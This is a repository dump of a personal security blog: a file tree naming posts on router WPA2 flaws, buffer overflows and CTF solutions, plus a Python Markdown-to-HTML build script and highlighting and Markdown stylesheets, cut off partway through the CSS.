├── .gitignore ├── README.md ├── build.py ├── css ├── code.css └── markdown.css ├── index.html ├── posts ├── 2013-03-08-wpa2-vulnerability-tplink │ ├── _main.md │ └── index.html ├── 2013-03-30-virtualdj-73-buffer-overflow │ ├── _main.md │ └── index.html ├── 2013-03-31-wpa2-vulnerability-linksys-dlink │ ├── _main.md │ └── index.html ├── 2013-04-20-virtualdj-74-buffer-overflow │ ├── _main.md │ └── index.html ├── 2016-03-16-ps3-gpu-exploit │ ├── _main.md │ └── index.html ├── 2016-08-22-observations │ ├── _main.md │ └── index.html ├── 2016-09-14-jit-compiled-maps │ ├── _main.md │ └── index.html ├── 2016-10-12-xchg-rax-rax-solutions │ ├── _main.md │ ├── index.html │ ├── xorpd_0x3c_hilbert.png │ ├── xorpd_0x3c_hilbert.py │ ├── xorpd_0x3d_morton.png │ ├── xorpd_0x3d_morton.py │ └── xorpd_0x3f_hanoi.png ├── 2017-07-19-googlectf-2017-moon │ ├── _main.md │ ├── _main.pdf │ ├── apitrace.png │ ├── bruteforcer.py │ ├── ida.png │ ├── index.html │ ├── latex-1.png │ ├── latex-2.png │ ├── moon.glsl │ └── moon.zip ├── 2018-04-18-lle-vs-hle │ ├── _main.md │ └── index.html ├── 2019-02-16-cell-miner-alu │ ├── _main.md │ ├── arithmetic.s │ └── index.html └── 2024-04-28-quotes │ └── _main.md ├── requirements.txt └── templates ├── index.html └── post.html /.gitignore: -------------------------------------------------------------------------------- 1 | *.ffs_db 2 | debug.log 3 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | Blog 2 | ==== 3 | 4 | Articles and resources of my blog. Written in Markdown. 5 | 6 | Licensed under [Creative Commons Attribution-ShareAlike 4.0 International License](http://creativecommons.org/licenses/by-sa/4.0/). 7 | -------------------------------------------------------------------------------- /build.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | import os 4 | 5 | import markdown 6 | import pygments 7 | 8 | # Globals 9 | index = [] 10 | 11 | # Markdown 12 | md = markdown.Markdown( 13 | encoding='utf=8', 14 | output_format='html5', 15 | extensions=[ 16 | 'markdown.extensions.codehilite', 17 | 'markdown.extensions.fenced_code', 18 | 'markdown.extensions.meta', 19 | 'markdown.extensions.tables', 20 | 'markdown.extensions.toc', 21 | ]) 22 | 23 | # Build 24 | def build_post_markdown(source, target): 25 | with open(source, 'r') as f: 26 | text = f.read() 27 | metadata = {} 28 | metadata['link'] = target 29 | content = md.convert(text) 30 | for k,v in md.Meta.items(): 31 | metadata[k] = v[0] 32 | index.append(metadata) 33 | with open('templates/post.html', 'r') as f: 34 | post = f.read() 35 | post = post.replace('$date', metadata['date']) 36 | post = post.replace('$title', metadata['title']) 37 | post = post.replace('$author', metadata['author']) 38 | post = post.replace('$content', content) 39 | with open(target, 'w') as f: 40 | f.write('\n') 41 | f.write(post) 42 | 43 | def build_post(path): 44 | source = os.path.join(path, '_main.md') 45 | target = os.path.join(path, 'index.html') 46 | if os.path.isfile(source): 47 | print('Building: %s' % source) 48 | build_post_markdown(source, target) 49 | 50 | def build_index(target): 51 | posts = 'DateArticle' 52 | for post in index[::-1]: 53 | link = post['link'].replace('index.html', '') 54 | posts += '%s%s' % ( 55 | post['date'], link, post['title']) 56 | posts = '%s
' % (posts) 57 | with open('templates/index.html', 'r') as f: 58 | html = f.read() 59 | html = html.replace('$posts', posts) 60 | with open(target, 'w') as f: 61 | f.write('\n') 62 | f.write(html) 63 | 64 | def build_all(): 65 | # Create posts 66 | posts = 'posts' 67 | for path in os.listdir(posts): 68 | path = os.path.join(posts, path) 69 | build_post(path) 70 | # Create index 71 | build_index('index.html') 72 | 73 | def main(): 74 | build_all() 75 | return 76 | 77 | if __name__ == '__main__': 78 | main() 79 | -------------------------------------------------------------------------------- /css/code.css: -------------------------------------------------------------------------------- 1 | .codehilite .hll { background-color: #ffffcc } 2 | .codehilite { background: #f8f8f8; } 3 | .codehilite .c { color: #408080; font-style: italic } /* Comment */ 4 | .codehilite .err { border: 0px solid #FF0000 } /* Error */ 5 | .codehilite .k { color: #008000; font-weight: bold } /* Keyword */ 6 | .codehilite .o { color: #666666 } /* Operator */ 7 | .codehilite .ch { color: #408080; font-style: italic } /* Comment.Hashbang */ 8 | .codehilite .cm { color: #408080; font-style: italic } /* Comment.Multiline */ 9 | .codehilite .cp { color: #BC7A00 } /* Comment.Preproc */ 10 | .codehilite .cpf { color: #408080; font-style: italic } /* Comment.PreprocFile */ 11 | .codehilite .c1 { color: #408080; font-style: italic } /* Comment.Single */ 12 | .codehilite .cs { color: #408080; font-style: italic } /* Comment.Special */ 13 | .codehilite .gd { color: #A00000 } /* Generic.Deleted */ 14 | .codehilite .ge { font-style: italic } /* Generic.Emph */ 15 | .codehilite .gr { color: #FF0000 } /* Generic.Error */ 16 | .codehilite .gh { color: #000080; font-weight: bold } /* Generic.Heading */ 17 | .codehilite .gi { color: #00A000 } /* Generic.Inserted */ 18 | .codehilite .go { color: #888888 } /* Generic.Output */ 19 | .codehilite .gp { color: #000080; font-weight: bold } /* Generic.Prompt */ 20 | .codehilite .gs { font-weight: bold } /* Generic.Strong */ 21 | .codehilite .gu { color: #800080; font-weight: bold } /* Generic.Subheading */ 22 | .codehilite .gt { color: #0044DD } /* Generic.Traceback */ 23 | .codehilite .kc { color: #008000; font-weight: bold } /* Keyword.Constant */ 24 | .codehilite .kd { color: #008000; font-weight: bold } /* Keyword.Declaration */ 25 | .codehilite .kn { color: #008000; font-weight: bold } /* Keyword.Namespace */ 26 | .codehilite .kp { color: #008000 } /* Keyword.Pseudo */ 27 | .codehilite .kr { color: #008000; font-weight: bold } /* Keyword.Reserved */ 28 | .codehilite .kt { color: #B00040 } /* Keyword.Type */ 29 | .codehilite .m { color: #666666 } /* Literal.Number */ 30 | .codehilite .s { color: #BA2121 } /* Literal.String */ 31 | .codehilite .na { color: #7D9029 } /* Name.Attribute */ 32 | .codehilite .nb { color: #008000 } /* Name.Builtin */ 33 | .codehilite .nc { color: #0000FF; font-weight: bold } /* Name.Class */ 34 | .codehilite .no { color: #880000 } /* Name.Constant */ 35 | .codehilite .nd { color: #AA22FF } /* Name.Decorator */ 36 | .codehilite .ni { color: #999999; font-weight: bold } /* Name.Entity */ 37 | .codehilite .ne { color: #D2413A; font-weight: bold } /* Name.Exception */ 38 | .codehilite .nf { color: #0000FF } /* Name.Function */ 39 | .codehilite .nl { color: #A0A000 } /* Name.Label */ 40 | .codehilite .nn { color: #0000FF; font-weight: bold } /* Name.Namespace */ 41 | .codehilite .nt { color: #008000; font-weight: bold } /* Name.Tag */ 42 | .codehilite .nv { color: #19177C } /* Name.Variable */ 43 | .codehilite .ow { color: #AA22FF; font-weight: bold } /* Operator.Word */ 44 | .codehilite .w { color: #bbbbbb } /* Text.Whitespace */ 45 | .codehilite .mb { color: #666666 } /* Literal.Number.Bin */ 46 | .codehilite .mf { color: #666666 } /* Literal.Number.Float */ 47 | .codehilite .mh { color: #666666 } /* Literal.Number.Hex */ 48 | .codehilite .mi { color: #666666 } /* Literal.Number.Integer */ 49 | .codehilite .mo { color: #666666 } /* Literal.Number.Oct */ 50 | .codehilite .sa { color: #BA2121 } /* Literal.String.Affix */ 51 | .codehilite .sb { color: #BA2121 } /* Literal.String.Backtick */ 52 | .codehilite .sc { color: #BA2121 } /* Literal.String.Char */ 53 | .codehilite .dl { color: #BA2121 } /* Literal.String.Delimiter */ 54 | .codehilite .sd { color: #BA2121; font-style: italic } /* Literal.String.Doc */ 55 | .codehilite .s2 { color: #BA2121 } /* Literal.String.Double */ 56 | .codehilite .se { color: #BB6622; font-weight: bold } /* Literal.String.Escape */ 57 | .codehilite .sh { color: #BA2121 } /* Literal.String.Heredoc */ 58 | .codehilite .si { color: #BB6688; font-weight: bold } /* Literal.String.Interpol */ 59 | .codehilite .sx { color: #008000 } /* Literal.String.Other */ 60 | .codehilite .sr { color: #BB6688 } /* Literal.String.Regex */ 61 | .codehilite .s1 { color: #BA2121 } /* Literal.String.Single */ 62 | .codehilite .ss { color: #19177C } /* Literal.String.Symbol */ 63 | .codehilite .bp { color: #008000 } /* Name.Builtin.Pseudo */ 64 | .codehilite .fm { color: #0000FF } /* Name.Function.Magic */ 65 | .codehilite .vc { color: #19177C } /* Name.Variable.Class */ 66 | .codehilite .vg { color: #19177C } /* Name.Variable.Global */ 67 | .codehilite .vi { color: #19177C } /* Name.Variable.Instance */ 68 | .codehilite .vm { color: #19177C } /* Name.Variable.Magic */ 69 | .codehilite .il { color: #666666 } /* Literal.Number.Integer.Long */ 70 | -------------------------------------------------------------------------------- /css/markdown.css: -------------------------------------------------------------------------------- 1 | @font-face { 2 | font-family: octicons-link; 3 | src: url(data:font/woff;charset=utf-8;base64,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) format('woff'); 4 | } 5 | 6 | .markdown-body .octicon { 7 | display: inline-block; 8 | fill: currentColor; 9 | vertical-align: text-bottom; 10 | } 11 | 12 | .markdown-body .anchor { 13 | float: left; 14 | line-height: 1; 15 | margin-left: -20px; 16 | padding-right: 4px; 17 | } 18 | 19 | .markdown-body .anchor:focus { 20 | outline: none; 21 | } 22 | 23 | .markdown-body h1 .octicon-link, 24 | .markdown-body h2 .octicon-link, 25 | .markdown-body h3 .octicon-link, 26 | .markdown-body h4 .octicon-link, 27 | .markdown-body h5 .octicon-link, 28 | .markdown-body h6 .octicon-link { 29 | color: #1b1f23; 30 | vertical-align: middle; 31 | visibility: hidden; 32 | } 33 | 34 | .markdown-body h1:hover .anchor, 35 | .markdown-body h2:hover .anchor, 36 | .markdown-body h3:hover .anchor, 37 | .markdown-body h4:hover .anchor, 38 | .markdown-body h5:hover .anchor, 39 | .markdown-body h6:hover .anchor { 40 | text-decoration: none; 41 | } 42 | 43 | .markdown-body h1:hover .anchor .octicon-link, 44 | .markdown-body h2:hover .anchor .octicon-link, 45 | .markdown-body h3:hover .anchor .octicon-link, 46 | .markdown-body h4:hover .anchor .octicon-link, 47 | .markdown-body h5:hover .anchor .octicon-link, 48 | .markdown-body h6:hover .anchor .octicon-link { 49 | visibility: visible; 50 | } 51 | 52 | .markdown-body { 53 | -ms-text-size-adjust: 100%; 54 | -webkit-text-size-adjust: 100%; 55 | color: #24292e; 56 | line-height: 1.5; 57 | font-family: -apple-system,BlinkMacSystemFont,Segoe UI,Helvetica,Arial,sans-serif,Apple Color Emoji,Segoe UI Emoji,Segoe UI Symbol; 58 | font-size: 16px; 59 | line-height: 1.5; 60 | word-wrap: break-word; 61 | } 62 | 63 | .markdown-body .pl-c { 64 | color: #6a737d; 65 | } 66 | 67 | .markdown-body .pl-c1, 68 | .markdown-body .pl-s .pl-v { 69 | color: #005cc5; 70 | } 71 | 72 | .markdown-body .pl-e, 73 | .markdown-body .pl-en { 74 | color: #6f42c1; 75 | } 76 | 77 | .markdown-body .pl-s .pl-s1, 78 | .markdown-body .pl-smi { 79 | color: #24292e; 80 | } 81 | 82 | .markdown-body .pl-ent { 83 | color: #22863a; 84 | } 85 | 86 | .markdown-body .pl-k { 87 | color: #d73a49; 88 | } 89 | 90 | .markdown-body .pl-pds, 91 | .markdown-body .pl-s, 92 | .markdown-body .pl-s .pl-pse .pl-s1, 93 | .markdown-body .pl-sr, 94 | .markdown-body .pl-sr .pl-cce, 95 | .markdown-body .pl-sr .pl-sra, 96 | .markdown-body .pl-sr .pl-sre { 97 | color: #032f62; 98 | } 99 | 100 | .markdown-body .pl-smw, 101 | .markdown-body .pl-v { 102 | color: #e36209; 103 | } 104 | 105 | .markdown-body .pl-bu { 106 | color: #b31d28; 107 | } 108 | 109 | .markdown-body .pl-ii { 110 | background-color: #b31d28; 111 | color: #fafbfc; 112 | } 113 | 114 | .markdown-body .pl-c2 { 115 | background-color: #d73a49; 116 | color: #fafbfc; 117 | } 118 | 119 | .markdown-body .pl-c2:before { 120 | content: "^M"; 121 | } 122 | 123 | .markdown-body .pl-sr .pl-cce { 124 | color: #22863a; 125 | font-weight: 700; 126 | } 127 | 128 | .markdown-body .pl-ml { 129 | color: #735c0f; 130 | } 131 | 132 | .markdown-body .pl-mh, 133 | .markdown-body .pl-mh .pl-en, 134 | .markdown-body .pl-ms { 135 | color: #005cc5; 136 | font-weight: 700; 137 | } 138 | 139 | .markdown-body .pl-mi { 140 | color: #24292e; 141 | font-style: italic; 142 | } 143 | 144 | .markdown-body .pl-mb { 145 | color: #24292e; 146 | font-weight: 700; 147 | } 148 | 149 | .markdown-body .pl-md { 150 | background-color: #ffeef0; 151 | color: #b31d28; 152 | } 153 | 154 | .markdown-body .pl-mi1 { 155 | background-color: #f0fff4; 156 | color: #22863a; 157 | } 158 | 159 | .markdown-body .pl-mc { 160 | background-color: #ffebda; 161 | color: #e36209; 162 | } 163 | 164 | .markdown-body .pl-mi2 { 165 | background-color: #005cc5; 166 | color: #f6f8fa; 167 | } 168 | 169 | .markdown-body .pl-mdr { 170 | color: #6f42c1; 171 | font-weight: 700; 172 | } 173 | 174 | .markdown-body .pl-ba { 175 | color: #586069; 176 | } 177 | 178 | .markdown-body .pl-sg { 179 | color: #959da5; 180 | } 181 | 182 | .markdown-body .pl-corl { 183 | color: #032f62; 184 | text-decoration: underline; 185 | } 186 | 187 | .markdown-body details { 188 | display: block; 189 | } 190 | 191 | .markdown-body summary { 192 | display: list-item; 193 | } 194 | 195 | .markdown-body a { 196 | background-color: transparent; 197 | } 198 | 199 | .markdown-body a:active, 200 | .markdown-body a:hover { 201 | outline-width: 0; 202 | } 203 | 204 | .markdown-body strong { 205 | font-weight: inherit; 206 | font-weight: bolder; 207 | } 208 | 209 | .markdown-body h1 { 210 | font-size: 2em; 211 | margin: .67em 0; 212 | } 213 | 214 | .markdown-body img { 215 | border-style: none; 216 | } 217 | 218 | .markdown-body code, 219 | .markdown-body kbd, 220 | .markdown-body pre { 221 | font-family: monospace,monospace; 222 | font-size: 1em; 223 | } 224 | 225 | .markdown-body hr { 226 | box-sizing: content-box; 227 | height: 0; 228 | overflow: visible; 229 | } 230 | 231 | .markdown-body input { 232 | font: inherit; 233 | margin: 0; 234 | } 235 | 236 | .markdown-body input { 237 | overflow: visible; 238 | } 239 | 240 | .markdown-body [type=checkbox] { 241 | box-sizing: border-box; 242 | padding: 0; 243 | } 244 | 245 | .markdown-body * { 246 | box-sizing: border-box; 247 | } 248 | 249 | .markdown-body input { 250 | font-family: inherit; 251 | font-size: inherit; 252 | line-height: inherit; 253 | } 254 | 255 | .markdown-body a { 256 | color: #0366d6; 257 | text-decoration: none; 258 | } 259 | 260 | .markdown-body a:hover { 261 | text-decoration: underline; 262 | } 263 | 264 | .markdown-body strong { 265 | font-weight: 600; 266 | } 267 | 268 | .markdown-body hr { 269 | background: transparent; 270 | border: 0; 271 | border-bottom: 1px solid #dfe2e5; 272 | height: 0; 273 | margin: 15px 0; 274 | overflow: hidden; 275 | } 276 | 277 | .markdown-body hr:before { 278 | content: ""; 279 | display: table; 280 | } 281 | 282 | .markdown-body hr:after { 283 | clear: both; 284 | content: ""; 285 | display: table; 286 | } 287 | 288 | .markdown-body table { 289 | border-collapse: collapse; 290 | border-spacing: 0; 291 | } 292 | 293 | .markdown-body td, 294 | .markdown-body th { 295 | padding: 0; 296 | } 297 | 298 | .markdown-body details summary { 299 | cursor: pointer; 300 | } 301 | 302 | .markdown-body h1, 303 | .markdown-body h2, 304 | .markdown-body h3, 305 | .markdown-body h4, 306 | .markdown-body h5, 307 | .markdown-body h6 { 308 | margin-bottom: 0; 309 | margin-top: 0; 310 | } 311 | 312 | .markdown-body h1 { 313 | font-size: 32px; 314 | } 315 | 316 | .markdown-body h1, 317 | .markdown-body h2 { 318 | font-weight: 600; 319 | } 320 | 321 | .markdown-body h2 { 322 | font-size: 24px; 323 | } 324 | 325 | .markdown-body h3 { 326 | font-size: 20px; 327 | } 328 | 329 | .markdown-body h3, 330 | .markdown-body h4 { 331 | font-weight: 600; 332 | } 333 | 334 | .markdown-body h4 { 335 | font-size: 16px; 336 | } 337 | 338 | .markdown-body h5 { 339 | font-size: 14px; 340 | } 341 | 342 | .markdown-body h5, 343 | .markdown-body h6 { 344 | font-weight: 600; 345 | } 346 | 347 | .markdown-body h6 { 348 | font-size: 12px; 349 | } 350 | 351 | .markdown-body p { 352 | margin-bottom: 10px; 353 | margin-top: 0; 354 | } 355 | 356 | .markdown-body blockquote { 357 | margin: 0; 358 | } 359 | 360 | .markdown-body ol, 361 | .markdown-body ul { 362 | margin-bottom: 0; 363 | margin-top: 0; 364 | padding-left: 0; 365 | } 366 | 367 | .markdown-body ol ol, 368 | .markdown-body ul ol { 369 | list-style-type: lower-roman; 370 | } 371 | 372 | .markdown-body ol ol ol, 373 | .markdown-body ol ul ol, 374 | .markdown-body ul ol ol, 375 | .markdown-body ul ul ol { 376 | list-style-type: lower-alpha; 377 | } 378 | 379 | .markdown-body dd { 380 | margin-left: 0; 381 | } 382 | 383 | .markdown-body code, 384 | .markdown-body pre { 385 | font-family: SFMono-Regular,Consolas,Liberation Mono,Menlo,Courier,monospace; 386 | font-size: 12px; 387 | } 388 | 389 | .markdown-body pre { 390 | margin-bottom: 0; 391 | margin-top: 0; 392 | } 393 | 394 | .markdown-body input::-webkit-inner-spin-button, 395 | .markdown-body input::-webkit-outer-spin-button { 396 | -webkit-appearance: none; 397 | appearance: none; 398 | margin: 0; 399 | } 400 | 401 | .markdown-body .border { 402 | border: 1px solid #e1e4e8!important; 403 | } 404 | 405 | .markdown-body .border-0 { 406 | border: 0!important; 407 | } 408 | 409 | .markdown-body .border-bottom { 410 | border-bottom: 1px solid #e1e4e8!important; 411 | } 412 | 413 | .markdown-body .rounded-1 { 414 | border-radius: 3px!important; 415 | } 416 | 417 | .markdown-body .bg-white { 418 | background-color: #fff!important; 419 | } 420 | 421 | .markdown-body .bg-gray-light { 422 | background-color: #fafbfc!important; 423 | } 424 | 425 | .markdown-body .text-gray-light { 426 | color: #6a737d!important; 427 | } 428 | 429 | .markdown-body .mb-0 { 430 | margin-bottom: 0!important; 431 | } 432 | 433 | .markdown-body .my-2 { 434 | margin-bottom: 8px!important; 435 | margin-top: 8px!important; 436 | } 437 | 438 | .markdown-body .pl-0 { 439 | padding-left: 0!important; 440 | } 441 | 442 | .markdown-body .py-0 { 443 | padding-bottom: 0!important; 444 | padding-top: 0!important; 445 | } 446 | 447 | .markdown-body .pl-1 { 448 | padding-left: 4px!important; 449 | } 450 | 451 | .markdown-body .pl-2 { 452 | padding-left: 8px!important; 453 | } 454 | 455 | .markdown-body .py-2 { 456 | padding-bottom: 8px!important; 457 | padding-top: 8px!important; 458 | } 459 | 460 | .markdown-body .pl-3, 461 | .markdown-body .px-3 { 462 | padding-left: 16px!important; 463 | } 464 | 465 | .markdown-body .px-3 { 466 | padding-right: 16px!important; 467 | } 468 | 469 | .markdown-body .pl-4 { 470 | padding-left: 24px!important; 471 | } 472 | 473 | .markdown-body .pl-5 { 474 | padding-left: 32px!important; 475 | } 476 | 477 | .markdown-body .pl-6 { 478 | padding-left: 40px!important; 479 | } 480 | 481 | .markdown-body .f6 { 482 | font-size: 12px!important; 483 | } 484 | 485 | .markdown-body .lh-condensed { 486 | line-height: 1.25!important; 487 | } 488 | 489 | .markdown-body .text-bold { 490 | font-weight: 600!important; 491 | } 492 | 493 | .markdown-body:before { 494 | content: ""; 495 | display: table; 496 | } 497 | 498 | .markdown-body:after { 499 | clear: both; 500 | content: ""; 501 | display: table; 502 | } 503 | 504 | .markdown-body>:first-child { 505 | margin-top: 0!important; 506 | } 507 | 508 | .markdown-body>:last-child { 509 | margin-bottom: 0!important; 510 | } 511 | 512 | .markdown-body a:not([href]) { 513 | color: inherit; 514 | text-decoration: none; 515 | } 516 | 517 | .markdown-body blockquote, 518 | .markdown-body dl, 519 | .markdown-body ol, 520 | .markdown-body p, 521 | .markdown-body pre, 522 | .markdown-body table, 523 | .markdown-body ul { 524 | margin-bottom: 16px; 525 | margin-top: 0; 526 | } 527 | 528 | .markdown-body hr { 529 | background-color: #e1e4e8; 530 | border: 0; 531 | height: .25em; 532 | margin: 24px 0; 533 | padding: 0; 534 | } 535 | 536 | .markdown-body blockquote { 537 | border-left: .25em solid #dfe2e5; 538 | color: #6a737d; 539 | padding: 0 1em; 540 | } 541 | 542 | .markdown-body blockquote>:first-child { 543 | margin-top: 0; 544 | } 545 | 546 | .markdown-body blockquote>:last-child { 547 | margin-bottom: 0; 548 | } 549 | 550 | .markdown-body kbd { 551 | background-color: #fafbfc; 552 | border: 1px solid #c6cbd1; 553 | border-bottom-color: #959da5; 554 | border-radius: 3px; 555 | box-shadow: inset 0 -1px 0 #959da5; 556 | color: #444d56; 557 | display: inline-block; 558 | font-size: 11px; 559 | line-height: 10px; 560 | padding: 3px 5px; 561 | vertical-align: middle; 562 | } 563 | 564 | .markdown-body h1, 565 | .markdown-body h2, 566 | .markdown-body h3, 567 | .markdown-body h4, 568 | .markdown-body h5, 569 | .markdown-body h6 { 570 | font-weight: 600; 571 | line-height: 1.25; 572 | margin-bottom: 16px; 573 | margin-top: 24px; 574 | } 575 | 576 | .markdown-body h1 { 577 | font-size: 2em; 578 | } 579 | 580 | .markdown-body h1, 581 | .markdown-body h2 { 582 | border-bottom: 1px solid #eaecef; 583 | padding-bottom: .3em; 584 | } 585 | 586 | .markdown-body h2 { 587 | font-size: 1.5em; 588 | } 589 | 590 | .markdown-body h3 { 591 | font-size: 1.25em; 592 | } 593 | 594 | .markdown-body h4 { 595 | font-size: 1em; 596 | } 597 | 598 | .markdown-body h5 { 599 | font-size: .875em; 600 | } 601 | 602 | .markdown-body h6 { 603 | color: #6a737d; 604 | font-size: .85em; 605 | } 606 | 607 | .markdown-body ol, 608 | .markdown-body ul { 609 | padding-left: 2em; 610 | } 611 | 612 | .markdown-body ol ol, 613 | .markdown-body ol ul, 614 | .markdown-body ul ol, 615 | .markdown-body ul ul { 616 | margin-bottom: 0; 617 | margin-top: 0; 618 | } 619 | 620 | .markdown-body li { 621 | word-wrap: break-all; 622 | } 623 | 624 | .markdown-body li>p { 625 | margin-top: 16px; 626 | } 627 | 628 | .markdown-body li+li { 629 | margin-top: .25em; 630 | } 631 | 632 | .markdown-body dl { 633 | padding: 0; 634 | } 635 | 636 | .markdown-body dl dt { 637 | font-size: 1em; 638 | font-style: italic; 639 | font-weight: 600; 640 | margin-top: 16px; 641 | padding: 0; 642 | } 643 | 644 | .markdown-body dl dd { 645 | margin-bottom: 16px; 646 | padding: 0 16px; 647 | } 648 | 649 | .markdown-body table { 650 | display: block; 651 | overflow: auto; 652 | width: 100%; 653 | } 654 | 655 | .markdown-body table th { 656 | font-weight: 600; 657 | } 658 | 659 | .markdown-body table td, 660 | .markdown-body table th { 661 | border: 1px solid #dfe2e5; 662 | padding: 6px 13px; 663 | } 664 | 665 | .markdown-body table tr { 666 | background-color: #fff; 667 | border-top: 1px solid #c6cbd1; 668 | } 669 | 670 | .markdown-body table tr:nth-child(2n) { 671 | background-color: #f6f8fa; 672 | } 673 | 674 | .markdown-body img { 675 | background-color: #fff; 676 | box-sizing: content-box; 677 | max-width: 100%; 678 | } 679 | 680 | .markdown-body img[align=right] { 681 | padding-left: 20px; 682 | } 683 | 684 | .markdown-body img[align=left] { 685 | padding-right: 20px; 686 | } 687 | 688 | .markdown-body code { 689 | background-color: rgba(27,31,35,.05); 690 | border-radius: 3px; 691 | font-size: 85%; 692 | margin: 0; 693 | padding: .2em .4em; 694 | } 695 | 696 | .markdown-body pre { 697 | word-wrap: normal; 698 | } 699 | 700 | .markdown-body pre>code { 701 | background: transparent; 702 | border: 0; 703 | font-size: 100%; 704 | margin: 0; 705 | padding: 0; 706 | white-space: pre; 707 | word-break: normal; 708 | } 709 | 710 | .markdown-body .highlight { 711 | margin-bottom: 16px; 712 | } 713 | 714 | .markdown-body .highlight pre { 715 | margin-bottom: 0; 716 | word-break: normal; 717 | } 718 | 719 | .markdown-body .highlight pre, 720 | .markdown-body pre { 721 | background-color: #f6f8fa; 722 | border-radius: 3px; 723 | font-size: 85%; 724 | line-height: 1.45; 725 | overflow: auto; 726 | padding: 16px; 727 | } 728 | 729 | .markdown-body pre code { 730 | background-color: transparent; 731 | border: 0; 732 | display: inline; 733 | line-height: inherit; 734 | margin: 0; 735 | max-width: auto; 736 | overflow: visible; 737 | padding: 0; 738 | word-wrap: normal; 739 | } 740 | 741 | .markdown-body .commit-tease-sha { 742 | color: #444d56; 743 | display: inline-block; 744 | font-family: SFMono-Regular,Consolas,Liberation Mono,Menlo,Courier,monospace; 745 | font-size: 90%; 746 | } 747 | 748 | .markdown-body .blob-wrapper { 749 | border-bottom-left-radius: 3px; 750 | border-bottom-right-radius: 3px; 751 | overflow-x: auto; 752 | overflow-y: hidden; 753 | } 754 | 755 | .markdown-body .blob-wrapper-embedded { 756 | max-height: 240px; 757 | overflow-y: auto; 758 | } 759 | 760 | .markdown-body .blob-num { 761 | -moz-user-select: none; 762 | -ms-user-select: none; 763 | -webkit-user-select: none; 764 | color: rgba(27,31,35,.3); 765 | cursor: pointer; 766 | font-family: SFMono-Regular,Consolas,Liberation Mono,Menlo,Courier,monospace; 767 | font-size: 12px; 768 | line-height: 20px; 769 | min-width: 50px; 770 | padding-left: 10px; 771 | padding-right: 10px; 772 | text-align: right; 773 | user-select: none; 774 | vertical-align: top; 775 | white-space: nowrap; 776 | width: 1%; 777 | } 778 | 779 | .markdown-body .blob-num:hover { 780 | color: rgba(27,31,35,.6); 781 | } 782 | 783 | .markdown-body .blob-num:before { 784 | content: attr(data-line-number); 785 | } 786 | 787 | .markdown-body .blob-code { 788 | line-height: 20px; 789 | padding-left: 10px; 790 | padding-right: 10px; 791 | position: relative; 792 | 